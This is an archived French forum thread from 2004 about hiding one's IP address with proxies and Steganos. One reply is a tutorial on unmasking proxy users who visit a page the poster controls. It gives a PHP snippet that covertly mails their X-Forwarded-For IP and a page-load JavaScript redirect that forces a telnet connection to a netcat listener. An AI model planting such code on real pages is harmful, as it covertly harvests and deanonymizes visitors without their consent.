rantanplan08 Posté(e) le 15 juillet 2004 Partager Posté(e) le 15 juillet 2004 Voilà j'aimerais pouvoir masquer totalement mon adresse IP au reste du monde... J'ai déjà ZoneAlarm Pro, qui la cache le plus possible aux yeux des autres ordi, mais hélas pas dans les téléchargeurs etc... C'est possible d'interdire à mon ordinateur de divulger cette information ??? Merci @+ Lien vers le commentaire Partager sur d’autres sites More sharing options...
capten Posté(e) le 15 juillet 2004 Partager Posté(e) le 15 juillet 2004 C'est pour quoi faire ? Aller sur des sites pédophiles ? Lien vers le commentaire Partager sur d’autres sites More sharing options...
nonas Posté(e) le 15 juillet 2004 Partager Posté(e) le 15 juillet 2004 A la base ton adresse ip est le seul moyen de connaitre ton ordinateur sur un réseau donc n'importe quel site que tu visites la voit. Après tu peux toujours passer par un proxy : ton pc --> proxy (pas chez toi) --> le net. Mais bon en général ça va bien pour le surf mais pour le téléchargement, c'est super rare de trouver un proxy rapide... Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dark26 Posté(e) le 15 juillet 2004 Partager Posté(e) le 15 juillet 2004 A la base ton adresse ip est le seul moyen de connaitre ton ordinateur sur un réseau donc n'importe quel site que tu visites la voit. Après tu peux toujours passer par un proxy : ton pc --> proxy (pas chez toi) --> le net. Mais bon en général ça va bien pour le surf mais pour le téléchargement, c'est super rare de trouver un proxy rapide... tout est dit proxy powa, mais lenteur aussi Lien vers le commentaire Partager sur d’autres sites More sharing options...
fabbe Posté(e) le 16 juillet 2004 Partager Posté(e) le 16 juillet 2004 tout est dit proxy powa, mais lenteur aussi de toute facon le proxi a un adresse IP aussi et aura la tienne en mémoire Donc n pourras toujours te retrouver , y auras qu'a faire paler le proxi ++ Lien vers le commentaire Partager sur d’autres sites More sharing options...
rantanplan08 Posté(e) le 16 juillet 2004 Auteur Partager Posté(e) le 16 juillet 2004 C'est pour quoi faire ? Aller sur des sites pédophiles ? Mais non lol !!! C'était juste pour savoir si c'étais possible c tout... Donc ce ne l'est pas... (je m'en doutais) Merci à tous @+ Lien vers le commentaire Partager sur d’autres sites More sharing options...
capten Posté(e) le 16 juillet 2004 Partager Posté(e) le 16 juillet 2004 Mais non lol !!!C'était juste pour savoir si c'étais possible c tout... Donc ce ne l'est pas... (je m'en doutais) Merci à tous @+ Je disais ca comme ca (J'ai aussi un pied au FBI ) Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dark26 Posté(e) le 16 juillet 2004 Partager Posté(e) le 16 juillet 2004 Mais non lol !!!C'était juste pour savoir si c'étais possible c tout... Donc ce ne l'est pas... (je m'en doutais) Merci à tous @+ ben si c'est possible avec un proxy, ou mieux une chaien de proxy Lien vers le commentaire Partager sur d’autres sites More sharing options...
nonas Posté(e) le 16 juillet 2004 Partager Posté(e) le 16 juillet 2004 ben si c'est possible avec un proxy, ou mieux une chaien de proxy Le vieux ping de chiotte, j'imagine même pas sans parler du débits .... Mais c'est vrai que certaines personnes utilisent ça. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Annubis45 Posté(e) le 16 juillet 2004 Partager Posté(e) le 16 juillet 2004 on s'en fout si c juste pour surfer Lien vers le commentaire Partager sur d’autres sites More sharing options...
nonas Posté(e) le 16 juillet 2004 Partager Posté(e) le 16 juillet 2004 on s'en fout si c juste pour surfer Oui enfin tu te retrouves très vite en comme en 56K... Je peux conseiller Steganos Je-sais-plus-quoi qui utilise une liste de proxy et en change toutes les minutes. Lien vers le commentaire Partager sur d’autres sites More sharing options...
l-_-l Posté(e) le 17 juillet 2004 Partager Posté(e) le 17 juillet 2004 Mai bon voila Ce log reste kelk peu limiter je propose donc une solution pour lr rendre plus performant : Comment faire de Steganos Internet Anonym Pro 6 un bon soft Dans ce tuto je vous propose d'améliorer ce soft Pour cela nous allons changez les proxys par default qui ne sont pas anonymes comme ils le pretendent. Vous avez deja essayé? Vous n'avez jamais vu cette option normale elle n'y est pas. Donc il faut passer par la Base de registre: Demmarrer->Executer et ecrire: regedit maintentant allez a cette adresse: HKEY_CURRENT_USER\Software\Steganos\InternetAnonymPro\6\SecureSurfing\Proxy\HTTP\ServerList Vous trouverez les proxys par defaut. Il vous suffit de les changer en mettant des proxys anonymes Vous pouurez trouver une liste regulierement a jour ici: http://www.anonymitychecker.com/page1.html http://www.stayinvisible.com/index.pl/proxy_list Voila maintenant vuos voulez testez votre anonyma Allez sur: http://check.sdv.fr/ Votre IP n'a pas ete trouvée? Normal ce tuto est fait pour ca. Votre IP est trouvée? ->Vous n'avez pas choisi de bon proxy ->Vous n'avez pas respectez le tuto Voila maintenant vous pouvez surfer en anonym... Lien vers le commentaire Partager sur d’autres sites More sharing options...
l-_-l Posté(e) le 17 juillet 2004 Partager Posté(e) le 17 juillet 2004 Un seul truc, puisk je me doute bien ke sa a un rapport avec le p2p ou les ng ... ( g po raison ? ) Pour les proxy : Alors que vous pensiez etre anonyme derriere votre proxys... Je vous demontre le contraire ! Pourquoi ? Comment ? Simplement par ce que le proxy utilise le protocole HTTP, et n'est fonctionnel qu'a travers les structures utilisant HTTP, or la j'ai engendre sur votre navigateur une connexion Telnet a mon serveur sur le port 25 (sendmail) ... Je verrai alors dans mes logs votre vraie IP c'est une application reelle ! Mais le meilleur n'est pas la ... Ici j'ai utilise une connexion reelle de Telnet qui se dirige vers un serveur SMTP dump mais j'aurais tres bien pu rediriger la connexion vers une petite application qui se charge de garder les logs et DANS CE CAS VOUS N'AURIEZ SIMPLEMENT RIEN VU ! Donc ne croyez pas que le proxy soit quelque chose de fiable, bien au contraire ! ------- En fait je vais vous exposer ici quelques techniques vous permettant de recuperer l'IP reelle d'un gars se connectant au net par l'intermediare d'un proxy. En effet dans ce cas vous voyez l'IP du proxy, et non la sienne. C'est le but d'ailleurs, non ? Mais on va pas se laisser demonter %-) Donc je vais exposer 2 methodes. * 1 ere methode, est en fait un melange d'infos recoltees sur le net et de reflexion personnelle (et vui je reflechis !!! si je vous assure !!!) qui vous permettra de recevoir dans votre boite mail l'IP d'un gars qui se promene sur une de vos pages sur un site. Pour cela votre site doit etre heberge sur un serveur supportant PHP, avec la fonction mail(); activee (actuellement c'est le cas de Lycos/Multimania, les autres je sais pas). L'idee est donc que les proxies sur lesquels se connectent les gars envoient souvent dans le Header des infos, dont la fameuse IP. Ces donnees envoyees par le serveur se nomment les VARIABLES D'ENVIRONNEMENT. Les variables d'environnement standard permettent d'ailleurs de recuperer l'IP d'un gars, mais ce n'est pas le but de notre tuto... Ici nous nous interesserons aux variables d'environnement propres aux proxies HTTP, qui sont au nombre de 6 : HTTP_PRAGMA Ancien mecanisme de gestion des methodes de cache des pages d'un serveur HTTP HTTP_CACHE_CONTROL Indication concernant les preferences du client HTTP en matiere de cache HTTP_CACHE_INFO Utilise par certains proxys pour indiquer au serveur HTTP combien de clients HTTP ont effectue cette requete par son intermediaire HTTP_PROXY_CONNECTION Seulement definie par certains proxys lorsque le client HTTP effectue sa requete par leur intermediaire HTTP_VIA Adresse, port utilise, nom et version du proxy utilise pour la requete. Seulement definie par certains proxys HTTP_X_FORWARDED_FOR Utilise par certains proxys pour indiquer l'adresse de la machine cliente pour laquelle ils effectuent la requete HTTP Je tiens d'ailleurs a remercier ici "Le Lamerz" (qui n'en est pas un d'ailleurs !!!) pour ces precieux renseignements ! ^_^ Merci Ici la variable qui nous interesse est la derniere, HTTP_X_FORWARDED_FOR, qui contient l'IP du gars derriere le proxy. L'idee est donc que le serveur sur lequel est heberge votre page PHP lit les informations envoyees par le proxy se connectant a lui, donc cette variable. Il est donc capable de la restituer par la fonction PHP getenv("param"); qui recupere la variable d'environnement nommee "param". Donc Code: <?php $vraieip = getenv("HTTP_X_FORWARDED_FOR"); ?> demande a votre serveur d'hebergement de stocker dans la variable $vraieip la vraie IP, c'est a dire le contenu de la variable d'environnement HTTP_X_FORWARDED_FOR. Vous pouvez l'afficher a l'ecran pour faire peur au gars, avec "print $vraieip;" mais notre but est de la recuperer discretement, en nous l'envoyant par mail. Il suffit de coder ceci : Code: <?php $vraieip = getenv("HTTP_X_FORWARDED_FOR"); mail("votre_mail@serveur.ext", "IP recoltees sur ma page internet", $vraieip); ?> et si comme je vous le disais au debut votre serveur d'hebergement accepte la fonction mail(); c'est dans la poche ! Pour ma part j'ai inclut ce script une journee sur mon site, juste pour tester, mais j'ai ete litterallement mail bombe !!! En effet le serveur renvoie l'IP a chaque reactualisation. Je l'ai donc vite retire, puisque de toute facon mon but n'est pas de hacker mes visiteurs. PAr contre si le gars ne passe pas par un proxy, la variable reste vide, vous devez donc envoyer par mail l'IP provenant de HTTP_X_FORWARDED_FOR, mais aussi celle de la variable d'environnement classique permettant de recuperer l'IP normale (dans un autre tuto peut-etre je vous ai dit !!!) * Une 2eme methode, touvé sur un forum (lekelle je c plus fo ke je fouille dans mes bookmark) Elle consiste toujours a amener le gars sur une page internet concoctee par vos soins Cette fois-ci pas besoin de PHP, juste un script javascript, a lancer au chargement de la page, le voici : Code: <script TYPE = "text/javascript"> function Gruss() { window.location.href = 'telnet://Newffr.zzn.com:25' } </SCRIPT> <body onLoad = "Gruss()"> Maintenant mes explications et eclaircissements apres analyse Vous devez remplacer Newffr.zzn.com par votre serveur, ou mieux votre machine (entre votre IP, je sais c'est dangereux). C'est ici qu'intervient l'utilisation du logiciel NetCat (ce qu'il appelle l'application qui garde les logs, c'est ca !) fourni avec un tuto d'explication. Il suffit dans le script de mettre votre IP au lieu du serveur, et sur votre machine de lancer NetCat en mode ecoute (listen) sur le port 25 (port sendmail). La commande est, apres avoir lance natcat, "-l -p 25". Ainsi vous ecoutez tout ce qui vient sur votre port 25. Dans notre exemple le script ouvre chez la victime ouvre son port telnet (23) et se connecte a votre IP au port 25. Le script si votre IP est 145.167.4.34 sera : Code: <script TYPE = "text/javascript"> function Gruss() { window.location.href = 'telnet://145.167.4.34:25' } </SCRIPT> <body onLoad = "Gruss()"> Cette technique oblige donc le navigateur du gars a se connecter a votre IP sur votre port 25. En effet les proxies filtrent les connections HTTP (port 8080), mais pas Telnet (25), donc le fait d'obliger le gars a se connecter a votre serveur (netcat en fait) vous devoilera son IP en regardant dans vos logs de netcat. Voilou c tou. Sinon le mieux c dinterdire le scan de ton pici par des pc de la riaa ou dotre organisme (detestable a mon gout) ici ou avec notre amis google Lien vers le commentaire Partager sur d’autres sites More sharing options...
KzR Posté(e) le 17 juillet 2004 Partager Posté(e) le 17 juillet 2004 le mieux c'est d'avoir accès à plusieurs Proxy très rapide comme le font les organisations pirates, en effet certaines ont plusieurs Proxy latents dans des pays "tranquilles" et là pour les retrouver... impossible, car les Proxy sont réglés pour effacer les traces de leurs inter-connexions... il faudrait "Pirater" leur proxy pour les identifier... mais bon en général, ils savent se protéger donc c'est possible, mais il faut du fric et des connaissances assez poussées Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.